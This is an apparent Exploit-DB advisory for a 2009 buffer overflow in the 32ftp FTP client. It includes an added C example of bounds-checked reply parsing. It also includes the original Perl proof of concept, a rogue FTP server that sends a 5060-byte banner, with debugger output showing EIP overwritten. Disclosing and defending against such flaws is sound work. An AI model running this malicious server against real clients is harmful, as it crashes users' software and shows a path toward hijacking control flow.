Vendor: 32ftp
By: Load 99%
CVSS: 7.5 (HIGH)
Vulnerability Type: Buffer Overflow
CWE: 119
Product Name: 32ftp
Affected Version From: 09.04.24
Affected Version To: 09.04.24
Patch Exists: YES
Related CWE: N/A
CPE: //a:electrasoft:32ftp:09.04.24
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2009

Client Side Vulnerability in the Product

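A client-side vulnerability in 32ftp 09.04.24 allows a remote FTP server to crash the client by sending it an oversized banner. The crash is triggered when a malicious server sends a 220 banner carrying 5060 bytes to the client, which overflows a buffer in the client. The debugger output included with the proof of concept shows EIP set to 0x41414141, the banner's filler byte, so the overflow affects control flow rather than only corrupting data.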

Mitigation:

The vendor has released a patch to address this vulnerability.
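
How a client can read the server's reply line without trusting its length, as an added example (not 32ftp's code and not the vendor's patch). The names `parse_ftp_reply`, `check_banner_of` and `REPLY_TEXT_MAX` are hypothetical, and the 512-byte cap is an assumed limit.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define REPLY_TEXT_MAX 512 /* assumed cap on reply text, not a protocol constant */
enum { REPLY_OK = 0, REPLY_INCOMPLETE = -1, REPLY_MALFORMED = -2, REPLY_TOO_LONG = -3 };

/* Parse one "NNN text\r\n" reply line from raw socket bytes (not NUL-terminated,
 * fully server-controlled). Every copy is bounded by text_cap, never by the
 * amount of data the server chose to send. */
static int parse_ftp_reply(const unsigned char *in, size_t in_len,
                           int *code, char *text, size_t text_cap)
{
    if (text_cap == 0) return REPLY_MALFORMED;
    text[0] = '\0';
    const unsigned char *lf = memchr(in, '\n', in_len);
    if (lf == NULL) /* no terminator yet: keep reading only while under the cap */
        return in_len > text_cap + 4 ? REPLY_TOO_LONG : REPLY_INCOMPLETE;

    size_t line_len = (size_t)(lf - in);
    if (line_len > 0 && in[line_len - 1] == '\r') line_len--;
    /* Three digits, then ' ' (final line) or '-' (multi-line reply). */
    if (line_len < 4 || !isdigit(in[0]) || !isdigit(in[1]) || !isdigit(in[2]) ||
        (in[3] != ' ' && in[3] != '-'))
        return REPLY_MALFORMED;
    size_t text_len = line_len - 4;
    if (text_len >= text_cap) /* would not fit together with the NUL */
        return REPLY_TOO_LONG;
    *code = (in[0] - '0') * 100 + (in[1] - '0') * 10 + (in[2] - '0');
    memcpy(text, in + 4, text_len);
    text[text_len] = '\0';
    return REPLY_OK;
}

/* Constructed sample: "220 " + n filler bytes + CRLF, the shape of the banner above. */
static int check_banner_of(size_t n)
{
    static unsigned char wire[8192];
    char text[REPLY_TEXT_MAX];
    int code = 0;
    if (n + 6 > sizeof wire) return REPLY_TOO_LONG;
    memcpy(wire, "220 ", 4);
    memset(wire + 4, 'A', n);
    memcpy(wire + 4 + n, "\r\n", 2);
    return parse_ftp_reply(wire, n + 6, &code, text, sizeof text);
}
```

A caller that gets `REPLY_TOO_LONG` should close the control connection instead of truncating and continuing, since the rest of the oversized line would otherwise be parsed as further replies.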

Exploit-DB raw data:

#!/usr/bin/perl
#
# A client side vulnerability in the product allows remote servers to cause the  client to crash by sending it a large banner.
#  By: Load 99%
#
# website: http://www.electrasoft.com/32ftp.htm
# Version:09.04.24
#
#0:005> g
# ...
#(9b0.bac): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=41414141 ebx=00000001 ecx=000013e7 edx=0382ec14 esi=fffffffe edi=00000000
#eip=41414141 esp=0382f018 ebp=0382f050 iopl=0         nv up ei pl nz na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
#41414141 ??              ???
#
use IO::Socket::INET;

my $socket = IO::Socket::INET->new('LocalPort' => 21,
                   'Proto' => 'tcp',
                   'Listen' => SOMAXCONN)
    or die "Can't create socket ($!)\n";
   
print "Server listening\n";
$data = "220 ".("\x41" x 5060)."\r\n";

while (my $client = $socket->accept) {
    print "send> data.\n";
    print $client $data;
}
die "Can't accept socket ($!)\n";

# milw0rm.com [2009-05-05]